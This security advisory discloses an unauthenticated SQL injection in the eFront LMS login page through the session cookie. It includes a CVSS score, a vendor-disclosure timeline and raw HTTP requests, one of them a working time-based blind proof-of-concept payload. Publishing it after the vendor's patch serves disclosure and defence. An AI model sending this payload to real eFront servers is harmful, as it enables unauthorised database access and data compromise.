Epignosis eFront LMS unauthenticated SQL injection vulnerability

Summary

An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

Tested Versions

Epignosis eFront LMS v5.2.12

Product URLs

<https://www.efrontlearning.com/&gt;

CVSSv3 Score

6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

The following parameters are vulnerable to unauthenticated SQL injection attacks:

PHPSessionID parameter:

GET / HTTP/1.1
Host: [IP]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSIDfb411=aaaaaaaaa%00'[SQL INJECTION]
Upgrade-Insecure-Requests: 1

PoC:

GET / HTTP/1.1
Host: [IP]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSIDfb411=bbbbbb%00' AND (SELECT 1 FROM (SELECT(SLEEP(8)))a) AND '1'='1
Upgrade-Insecure-Requests: 1

Timeline

2019-07-29 - Vendor disclosure
2019-07-31 - Vendor acknowledged issues under review
2019-08-13 - Vendor acknowledged work to fix issues & testing
2019-08-30 - Vendor patched/released new version
2019-09-03 - Public disclosure